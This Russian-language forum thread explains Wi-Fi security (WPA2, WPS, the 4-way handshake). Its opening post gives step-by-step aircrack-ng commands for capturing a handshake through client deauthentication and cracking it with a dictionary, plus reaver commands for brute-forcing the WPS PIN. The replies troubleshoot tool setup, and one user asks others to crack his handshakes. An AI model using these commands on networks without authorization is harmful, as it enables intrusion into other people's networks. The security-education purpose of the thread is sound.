Взлом и защита Wi-Fi. Описание технологии.

Уязвимости, взломы и способы защиты. Вирусы здесь не обсуждаются

Модераторы: Tim308, phantom

Ответить
Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 26 апр 2014, 00:34

В этом ролике я постарался описать как вообще работает Wi-Fi, как происходит авторизация и рассказал о технологии WPA2-PSK, WPS, AES и TKIP, а также о методах шифрования трафика в wi-fi и стандарте ieee.802.11i и о том что такое 4-х стороннее рукопожатие (4-way handshake). А еще посмотрев этот ролик вы узнаете как можно взломать wi-fi сеть, почему такое происходит и как попытаться от этого защититься. Все что я делал в ролике было выполнено на моем личном оборудовании и ничьих сетей я не взламывал.
Список команд для BackTrack которые я использовал в видео с описанием:
Взлом Wi-Fi путем перехвата HandShake. WPA/WPA2
Для вывода справки к любой команде укажите ключ -H или —help. Например:

Код: Выделить всё

aircrack-ng -help
  1. Узнаем имя нашей карты wifi

    Код: Выделить всё

    ifconfig wlan
  2. Переводим ее в режим мониторинга

    Код: Выделить всё

    airmon-ng start wlan0
  3. Сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)

    Код: Выделить всё

    airodump-ng mon0
  4. Запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)

    Код: Выделить всё

    airodump-ng mon0 --channel [номер канала] --bssid [MAC-адрес точки доступа] -w [Путь для сохранения файла *.cap]
  5. Отключаем клиента от интересующей нас сети что-бы получить handshake

    Код: Выделить всё

    aireplay-ng -0 1 -a [MAC-адрес точки доступа] -c [MAC-адрес клиента] mon0
  6. Запускаем перебор по словарю

    Код: Выделить всё

    aircrack-ng -w [Путь к словарю с паролями] -b [MAC-адрес точки доступа] [Путь к сохраненному ранее файлу *.cap]
Взлом Wi-Fi путем подбора PIN от WPS
Для вывода справки к любой команде укажите ключ -H или —help. Например:

Код: Выделить всё

aircrack-ng -help
  1. Узнаем имя нашей карты wifi

    Код: Выделить всё

    ifconfig wlan
  2. Переводим ее в режим мониторинга

    Код: Выделить всё

    airmon-ng start wlan0
  3. Сканируем точки доступа с включенным режимом WPS (если пункт WPS-Loced в значении no, точка подвержена взлому)

    Код: Выделить всё

    wash -i mon0
  4. Запускаем подбор PIN (т.к. цифр 8 то комбинаций 100 000 000) у точки mac-адрес которой узнали из предыдущей команды

    Код: Выделить всё

    reaver -i mon0 -b [MAC-адрес точки доступа] -vv
Для решения проблемы с неверной работой команды и ошибкой -1 которая предлагает запустить команду с параметром --ignore-negative-one есть четыре возможных решения:

1) Попытаться выполнить команду с предложенным параметром:

Код: Выделить всё

aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0 --ignore-negative-one
2) Относительно сложный - нужно пропатчить ядро системы воспользовавшись инструкцией с этой страницы - http://www.aircrack-ng.org/doku.php?id=compat-wireless;

3) Обновить версию Aircrack-ng до последней на данный момент. Для этого выполните эти команды (нужно чтобы был подключен интернет):

Код: Выделить всё

svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng
make
make install
4) Если ничего выше не поможет просто обновите версию Kali Linux до последней в ней уже будет обновленная версия Aircrack-ng


Bugulma
Новичок
Сообщения: 3
Зарегистрирован: 05 май 2014, 15:54
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение Bugulma » 05 май 2014, 17:01

Доброго дня...где можно скачать бэктрек5р3..через поисковик везде так или иначе требуют денег...спасибо..

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 05 май 2014, 17:07

Bugulma писал(а):Доброго дня...где можно скачать бэктрек5р3..через поисковик везде так или иначе требуют денег...спасибо..
Здесь вот раздают - http://rutracker.org/forum/viewtopic.php?t=4153616
А вообще лучше Kali Linux качайте так как BackTrack уже не поддерживают.


Bugulma
Новичок
Сообщения: 3
Зарегистрирован: 05 май 2014, 15:54
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение Bugulma » 05 май 2014, 17:31

Kali Linux хорошо...но мой нод32 орет и не пускает ни этот сайт ни скачку.. в что то не так??7

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 05 май 2014, 17:43

Bugulma писал(а):Kali Linux хорошо...но мой нод32 орет и не пускает ни этот сайт ни скачку.. в что то не так??7
Он вас на Kali.org не пускает? Интересно что именно он пишет?
А вообще Kali.org это официальный сайт и там вирусов вы не нацепляете если вопрос только в этом.


Bugulma
Новичок
Сообщения: 3
Зарегистрирован: 05 май 2014, 15:54
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение Bugulma » 05 май 2014, 18:32

сделал попытку скачки... вот что выщло....может надо было выбрать из списка что предлагает сайт...у меня нетбук семерка стоит...

*Вложенные изображения удалены администратором по техническим причинам.

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 05 май 2014, 18:41

Bugulma писал(а):сделал попытку скачки... вот что выщло....может надо было выбрать из списка что предлагает сайт...у меня нетбук семерка стоит...
Nod ругается на Download Manager а не на сайт или дистрибутив kali linux, так что для загрузки воспользуйтесь стандартными возможностями браузера, либо-же качайте через uTorrent.

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Ветка Kali Linux

Сообщение chutkij » 16 май 2014, 18:31

Доброго времени Уважаемые.
Прошу прощения, если задаю вопрос не в той ветке, но я еще не совсем разобрался, что к чему.
Мое знакомство с линуксом началось неделю назад с того, что я увидел в интернете ролик по взлому и защите вайфай, ролик мне очень понравился, ибо он качественно и информационно гораздо выше всех аналогичных по этой теме. Я скачал бектрек-5-р3, установил его на комп и пытаюсь взломать собственную сеть, в ролике описаны 2 способа взлома, по словарю (и с ним проблемм нет ) и взлом WPS, он как-бы легче и быстрее, но я натолкнулся на проблемму такого рода, когда я ввел команду wash -i mon0, программа вежливо уведомила меня о том, что такой команды wash она не знает и предложила мне с десяток похожих команд.
Подскажите пожалуйста, в чем причина и возможно-ли исправить эту проблемму ?
Еще раз прошу прощения, если не в той ветке написал.

P.S. Вот ссылка на видео. https://www.youtube.com/watch?v=uh0Ri9440BQ
Последний раз редактировалось DesignerMix 16 май 2014, 18:31, всего редактировалось 2 раза.
Причина: Перенесено. Администратор

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Ветка Kali Linux

Сообщение DesignerMix » 16 май 2014, 19:50

chutkij писал(а):но я натолкнулся на проблемму такого рода, когда я ввел команду wash -i mon0, программа вежливо уведомила меня о том, что такой команды wash она не знает и предложила мне с десяток похожих команд.
Попробуйте выполнить следующие команды:

Создайте директорию /etc/reaver командой:

Код: Выделить всё

mkdir /etc/reaver
После этого снова запустите wash:

Код: Выделить всё

wash -i mon0

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 16 май 2014, 20:27

Извините, я пока не силен в этом всем, мне нужно сделать следующее:
ifconfig wlan
airmon-ng stsrt wlan0
mkdir /etc/reaver
wash -i mon0
В таком порядке ?

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 16 май 2014, 20:29

ой, ошибку допустил в слове start

Аватара пользователя

VfAcorp
Новичок
Сообщения: 14
Зарегистрирован: 25 апр 2014, 21:04
Откуда: Российская Федерация город Белгород
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение VfAcorp » 16 май 2014, 20:45

chutkij писал(а):Извините, я пока не силен в этом всем, мне нужно сделать следующее:
ifconfig wlan
airmon-ng stsrt wlan0
mkdir /etc/reaver
wash -i mon0
В таком порядке ?
Читайте шапку темы, там все команды указаны в том порядке в котором они должны выполняться.

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 16 май 2014, 21:31

Дык в том-то и дело, что должны, но не все выполняются.
Вот я и прошу помоч разобраться в этом.

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 16 май 2014, 21:44

chutkij писал(а):Извините, я пока не силен в этом всем, мне нужно сделать следующее:
ifconfig wlan
airmon-ng stsrt wlan0
mkdir /etc/reaver
wash -i mon0
В таком порядке ?
Ну да, в таком, но в принципе для проверки будет-ли работать команда wash можно выполнить команды в том порядке в котором я писал здесь - http://www.dmyt.ru/forum/viewtopic.php?f=7&t=2#p155
Если заработает, то можно больше папку не пересоздавать командой mkdir и выполнять так как описано в шапке.

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 16 май 2014, 23:29

Попробовал, ничего не поменялось к сожалению.

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 16 май 2014, 23:33

Скаите, а если поставить калилинукс вместо бектрека, команды такие-же используются ?

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 16 май 2014, 23:44

chutkij писал(а):Попробовал, ничего не поменялось к сожалению.
Прикрепите скриншот с выполнением команд.
chutkij писал(а):Скаите, а если поставить калилинукс вместо бектрека, команды такие-же используются ?
Да.


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение link » 17 май 2014, 19:17

Кто расшифрует мои хэндшейки?)

Аватара пользователя

chutkij
Интересующийся
Сообщения: 42
Зарегистрирован: 16 май 2014, 17:37
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение chutkij » 17 май 2014, 23:05

Здравствуйте.
К сожалению лишился дополнительной машины , пришлось установить "кали-линукс" на виртуал бокс, но к сожалению, виртуалбокс не определяет адаптепр, как wlan0.
Я не могу сканировать сети.
Возможно-ли как-то заставить виртуалбокс воспринимать usb wifi- адаптер как wlan0 ?
Помогите пож...

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4817
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 186
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: Взлом и защита Wi-Fi. Описание технологии.

Сообщение DesignerMix » 17 май 2014, 23:40

chutkij писал(а):Здравствуйте.
К сожалению лишился дополнительной машины , пришлось установить "кали-линукс" на виртуал бокс, но к сожалению, виртуалбокс не определяет адаптепр, как wlan0.
Я не могу сканировать сети.
Возможно-ли как-то заставить виртуалбокс воспринимать usb wifi- адаптер как wlan0 ?
Помогите пож...
Для начала выведете список доступных адаптеров командой

Код: Выделить всё

ifconfig
Если среди отобразившихся адаптеров не будет Wlan0 это может означать два варианта:
1. Virtual Box не видит адаптера из-за собственных настроек;
2. Virtual Box видит адаптер, но Kali Linux либо не имеет драйвера на него либо вовсе не поддерживает работу с ним.

Первый вариант решается так - правой кнопкой на виртуальную машину -> настройки -> USB -> затем нажмите на значок с зеленым плюсом и выберете из списка ваш USB-WiFi адаптер. После этого он должен появиться в списке по центру окна, затем нажмите OK и запускайте виртуалку. Адаптер должен отключиться от основной машины и переключиться на виртуальную.
После запуска снова выполните команду ifconfig. Если все правильно то он должен будет появиться в списка с именем Wlan0.

Второй вариант решается загрузкой и установкой драйвера, но т.к. вы не указали модель адаптера я не могу подсказать где его искать... Либо-же Kali-linux вовсе не держит ваш адаптер и тогда все плохо (но это маловероятно).

Ответить

Вернуться в «Информационная безопасность»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость